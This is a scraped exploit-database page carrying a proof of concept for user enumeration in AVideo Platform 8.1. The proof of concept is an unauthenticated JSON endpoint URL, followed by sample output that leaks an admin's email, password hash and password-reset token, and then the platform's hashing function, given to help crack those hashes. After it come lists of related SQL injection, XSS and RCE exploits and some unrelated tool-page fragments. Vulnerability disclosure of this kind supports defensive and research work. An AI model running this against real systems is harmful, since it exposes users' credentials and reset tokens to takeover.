Menu

Search for hundreds of thousands of exploits

"AVideo Platform 8.1 - Information Disclosure (User Enumeration)"

Author

Exploit author

"Ihsan Sencan"

Platform

Exploit platform

json

Release date

Exploit published date

2020-02-05

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# Exploit Title: AVideo Platform 8.1 - Information Disclosure (User Enumeration)
# Dork: N/A
# Date: 2020-02-05
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://avideo.com
# Software Link: https://github.com/WWBN/AVideo
# Version: 8.1
# Tested on: Linux
# CVE: N/A

# POC: 
# 1)
# http://localhost/[PATH]/objects/playlistsFromUser.json.php?users_id=[ID]
# 
................
0	
id	92
user	"admin"
name	"Watch Later"
email	"user@localhost"
password	"bc79a173cc20f0897db1c5b004588db9"
created	"2019-05-16 21:42:42"
modified	"2019-05-16 21:42:42"
isAdmin	1
status	"watch_later"
photoURL	"videos/userPhoto/photo1.png"
lastLogin	"2020-02-03 08:11:08"
recoverPass	"0ce70c7b006c78552fee993adeaafadf"
................
# 
# Hash function to be converted ....
# 
function encryptPassword($password, $noSalt = false) {
    global $advancedCustom, $global, $advancedCustomUser;
    if (!empty($advancedCustomUser->encryptPasswordsWithSalt) && !empty($global['salt']) && empty($noSalt)) {
        $password .= $global['salt'];
    }

    return md5(hash("whirlpool", sha1($password)));
}
#
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-10-09 "openMAINT 1.1-2.4.2 - Arbitrary File Upload" webapps json mrb3n
2020-10-06 "EasyPMS 1.0.0 - Authentication Bypass" webapps json Jok3r
2020-04-21 "NSClient++ 0.5.2.35 - Authenticated Remote Code Execution" webapps json kindredsec
2020-02-05 "AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)" webapps json "Ihsan Sencan"
2020-02-05 "AVideo Platform 8.1 - Information Disclosure (User Enumeration)" webapps json "Ihsan Sencan"
2020-02-05 "Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC)" webapps json nxkennedy
2019-10-30 "Ajenti 2.1.31 - Remote Code Exection (Metasploit)" webapps json "Onur ER"
2019-09-25 "NPMJS gitlabhook 0.0.17 - 'repository' Remote Command Execution" webapps json "Semen Alexandrovich Lyhin"
2018-11-05 "Royal TS/X - Information Disclosure" webapps json "Jakub Palaczynski"
2018-04-09 "CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution" webapps json "RedTeam Pentesting"
Release Date Title Type Platform Author
2020-10-23 "User Registration & Login and User Management System 2.1 - SQL Injection" webapps php "Ihsan Sencan"
2020-10-23 "Stock Management System 1.0 - 'brandId and categoriesId' SQL Injection" webapps php "Ihsan Sencan"
2020-02-07 "QuickDate 1.3.2 - SQL Injection" webapps php "Ihsan Sencan"
2020-02-06 "Online Job Portal 1.0 - 'user_email' SQL Injection" webapps php "Ihsan Sencan"
2020-02-06 "Online Job Portal 1.0 - Remote Code Execution" webapps php "Ihsan Sencan"
2020-02-06 "Online Job Portal 1.0 - Cross Site Request Forgery (Add User)" webapps php "Ihsan Sencan"
2020-02-05 "AVideo Platform 8.1 - Information Disclosure (User Enumeration)" webapps json "Ihsan Sencan"
2020-02-05 "AVideo Platform 8.1 - Cross Site Request Forgery (Password Reset)" webapps json "Ihsan Sencan"
2019-01-28 "Mess Management System 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-28 "Teameyo Project Management System 1.0 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-25 "GreenCMS 2.x - SQL Injection" webapps php "Ihsan Sencan"
2019-01-25 "GreenCMS 2.x - Arbitrary File Download" webapps php "Ihsan Sencan"
2019-01-24 "Joomla! Component JHotelReservation 6.0.7 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-24 "Joomla! Component J-CruisePortal 6.0.4 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-24 "SimplePress CMS 1.0.7 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component JMultipleHotelReservation 6.0.7 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vBizz 1.0.7 - Remote Code Execution" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component J-ClassifiedsManager 3.0.5 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vBizz 1.0.7 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vRestaurant 1.9.4 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vReview 1.9.11 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vAccount 2.0.2 - 'vid' SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component VMap 1.9.6 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component vWishlist 1.0.1 - SQL Injection" webapps php "Ihsan Sencan"
2019-01-23 "Joomla! Component J-BusinessDirectory 4.9.7 - 'type' SQL Injection" webapps php "Ihsan Sencan"
2019-01-22 "Joomla! Component Easy Shop 1.2.3 - Local File Inclusion" webapps php "Ihsan Sencan"
2019-01-21 "Reservic 1.0 - 'id' SQL Injection" webapps php "Ihsan Sencan"
2019-01-21 "MoneyFlux 1.0 - 'id' SQL Injection" webapps php "Ihsan Sencan"
2019-01-21 "PHP Dashboards NEW 5.8 - Local File Inclusion" webapps php "Ihsan Sencan"
2019-01-21 "Coman 1.0 - 'id' SQL Injection" webapps php "Ihsan Sencan" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected